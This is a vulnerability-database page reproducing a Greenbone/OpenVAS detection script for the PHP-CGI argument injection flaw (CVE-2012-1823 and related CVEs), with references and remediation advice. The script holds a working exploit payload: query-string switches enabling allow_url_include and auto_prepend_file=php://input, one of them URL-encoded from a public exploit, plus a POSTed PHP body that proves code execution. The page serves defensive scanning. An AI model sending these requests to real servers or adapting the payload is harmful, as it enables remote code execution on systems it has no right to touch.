Lucene search
K

PHP < 5.3.13, 5.4.x < 5.4.3 Multiple Vulnerabilities - Active Check

🗓️ 04 May 2012 00:00:00Reported by Copyright (C) 2012 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 523 Views

PHP < 5.3.13, 5.4.x < 5.4.3 Multiple Vulnerabilities - Active Check. Vulnerabilities affect PHP versions prior to 5.3.13 and 5.4.x prior to 5.4.3. Update to version 5.3.13, 5.4.3 or later

Related
Refs
Code
ReporterTitlePublishedViews
Family
zdt
PHP CGI Argument Injection
5 May 201200:00
zdt
zdt
PHP CGI Argument Injection Exploit
5 May 201200:00
zdt
zdt
PHP CGI Argument Injection Remote Exploit (PHP Version)
20 May 201200:00
zdt
zdt
Plesk Apache Zeroday Remote Exploit
6 Jun 201300:00
zdt
zdt
Apache Magicka Remote Code Execution Vulnerability
31 Oct 201300:00
zdt
githubexploit
Exploit for OS Command Injection in Php
8 Jun 202406:36
githubexploit
githubexploit
Exploit for OS Command Injection in Php
11 Jun 202415:11
githubexploit
githubexploit
Exploit for OS Command Injection in Php
12 Jun 202411:50
githubexploit
githubexploit
Exploit for Command Injection in Php
30 Jun 202616:01
githubexploit
githubexploit
Exploit for OS Command Injection in Php
30 Dec 202517:49
githubexploit
Rows per page
# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103482");
  script_version("2026-04-23T06:21:05+0000");
  script_cve_id("CVE-2012-1823", "CVE-2012-2311", "CVE-2012-2336", "CVE-2012-2335");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"2026-04-23 06:21:05 +0000 (Thu, 23 Apr 2026)");
  script_tag(name:"creation_date", value:"2012-05-04 10:40:34 +0100 (Fri, 04 May 2012)");
  script_name("PHP < 5.3.13, 5.4.x < 5.4.3 Multiple Vulnerabilities - Active Check");
  # nb: .exe file access and similar might be already seen as an attack...
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_dependencies("find_service.nasl", "httpver.nasl", "no404.nasl", "webmirror.nasl",
                      "DDI_Directory_Scanner.nasl", "gb_php_http_detect.nasl",
                      "global_settings.nasl", "os_detection.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_xref(name:"URL", value:"https://web.archive.org/web/20190212080415/http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/");
  script_xref(name:"URL", value:"https://www.kb.cert.org/vuls/id/520827");
  script_xref(name:"URL", value:"https://bugs.php.net/bug.php?id=61910");
  script_xref(name:"URL", value:"https://www.php.net/manual/en/security.cgi-bin.php");
  script_xref(name:"URL", value:"https://web.archive.org/web/20210121223743/http://www.securityfocus.com/bid/53388");
  script_xref(name:"URL", value:"https://web.archive.org/web/20120709064615/http://www.h-online.com/open/news/item/Critical-open-hole-in-PHP-creates-risks-Update-2-1567532.html");
  script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
  script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");

  script_tag(name:"summary", value:"PHP is prone to multiple vulnerabilities.");

  script_tag(name:"vuldetect", value:"Send multiple a crafted HTTP POST requests and checks the
  responses.

  Notes:

  - This script checks for the presence of CVE-2012-1823 which indicates that the system is also
  affected by the other included CVEs.

  - It is currently expected that a result of this VT is reported if the system is generally
  exposing a phpinfo() output on the relevant URL / endpoint (independent from the running product).
  Exposing such sensitive information is generally seen as a security misconfiguration and should be
  avoided.");

  script_tag(name:"insight", value:"When PHP is used in a CGI-based setup (such as Apache's
  mod_cgid), the php-cgi receives a processed query string parameter as command line arguments which
  allows command-line switches, such as -s, -d or -c to be passed to the php-cgi binary, which can
  be exploited to disclose source code and obtain arbitrary code execution.

  An example of the -s command, allowing an attacker to view the source code of index.php is below:

  http://example.com/index.php?-s");

  script_tag(name:"impact", value:"Exploiting this issue allows remote attackers to view the source
  code of files in the context of the server process. This may allow the attacker to obtain
  sensitive information and to run arbitrary PHP code on the affected computer. Other attacks are
  also possible.");

  script_tag(name:"affected", value:"PHP versions prior to 5.3.13 and 5.4.x prior to 5.4.3.

  Other products / applications might be affected by the tested CVE-2012-1823 as well.");

  script_tag(name:"solution", value:"PHP: Update to version 5.3.13, 5.4.3 or later

  - Other products / applications: Please contact the vendor for a solution");

  script_tag(name:"qod_type", value:"remote_active");
  script_tag(name:"solution_type", value:"VendorFix");

  script_timeout(600);

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");
include("misc_func.inc");
include("os_func.inc");

port = http_get_port(default:80);
if(!http_can_host_php(port:port))
  exit(0);

host = http_host_name(dont_add_port:TRUE);
_phps = http_get_kb_file_extensions(port:port, host:host, ext:"php");

if(!isnull(_phps)) {
  _phps = make_list("/", "/index.php", _phps);
} else {
  _phps = make_list("/", "/index.php");
}

cgi_dirs = make_list("", "/cgi-bin", "/cgi", "/php-cgi");

foreach cgi_dir(cgi_dirs) {
  _phps = make_list(
  cgi_dir + "/php",
  cgi_dir + "/php4",
  cgi_dir + "/php4-cgi",
  cgi_dir + "/php4.cgi",
  cgi_dir + "/php5",
  cgi_dir + "/php5-cgi",
  cgi_dir + "/php5.cgi",
  cgi_dir + "/php-cgi",
  cgi_dir + "/php.cgi",
  _phps);
}

# nb: Unlikely that a system is using/exposing such .exe files these days so only throw these
# against systems which we definitely know that they are Windows ones.
if(os_host_runs("windows") == "yes") {
  foreach cgi_dir(cgi_dirs) {
    _phps = make_list(
    cgi_dir + "/php-cgi.exe",
    cgi_dir + "/php.exe",
    _phps);
  }
}

_phps = make_list_unique(_phps);

# nb: False positive prevention (e.g. if the "/index.php" or any other detected .php file is
# exposing the phpinfo() output directly)
phpinfos = get_kb_list("php/phpinfo/" + host + "/" + port + "/detected_urls");
phps = make_list();
if(phpinfos) {
  foreach p(_phps) {
    exist = FALSE;
    foreach pi(phpinfos) {
      if(p == pi)
        exist = TRUE;
      break;
    }
    if(!exist)
      phps = make_list(phps, p);
  }
} else {
  phps = _phps;
}

# nb:
# - Max amount of files to check
# - Our "_phps" list has (currently) at least 37 entries (+ 8 on Windows) so we use this number as
#   the current max checks so that we at least test all known defaults defined above
max_done_checks  = 45;
curr_done_checks = 0;

post_data = "<?php phpinfo();?>";

# nb:
# - an "on" is used for "allow_url_include" but the following says it is a bool:
#   > https://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include
#   Might be possible that PHP is supporting / had supported both and thus the "on" has been kept
#   here / below as this had been proofed to be working against the affected versions. If the code
#   / requests below are ever used to test newer PHP versions for a similar flaw consider using a
#   bool (e.g. 1) instead.
# - Additional note when using the second Kingcope code to test newer PHP versions: safe_mode has
#   been removed in PHP 5.4.0 and Suhosin is also no longer available so you might want to drop
#   these as well.
# - allow_url_include seems to be deprecated since PHP 7.4 which should be also kept in mind:
#   > https://www.php.net/manual/en/migration74.deprecated.php#migration74.deprecated.core.allow-url-include
#
post_urls[i++] = "-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input";
post_urls[i++] = "%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64" +
                 "+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%7" +
                 "3%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%7" +
                 "5%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%7" +
                 "2%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%6" +
                 "5%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5" +
                 "F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%7" +
                 "4%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E"; # from Kingcope apache-magika.c (-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n)

foreach php(phps) {
  foreach post_url(post_urls) {

    url = php + "?" + post_url;
    req = http_post_put_req(port:port, url:url, data:post_data, add_headers:make_array("Content-Type", "application/x-www-form-urlencoded"));
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if(!res)
      continue;

    if(found = http_check_for_phpinfo_output(data:res)) {

      info['"HTTP POST" body'] = post_data;
      info["URL"] = http_report_vuln_url(port:port, url:url, url_only:TRUE);

      report  = 'By doing the following HTTP POST request:\n\n';
      report += text_format_table(array:info) + '\n\n';
      report += 'it was possible to execute the "' + post_data + '" command.';
      report += '\n\nResult:\n' + chomp(found);

      expert_info = 'Request:\n'+ req + 'Response:\n' + res;
      security_message(port:port, data:report, expert_info:expert_info);
      exit(0);
    }
  }

  curr_done_checks++;
  if(curr_done_checks > max_done_checks)
    exit(99);
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation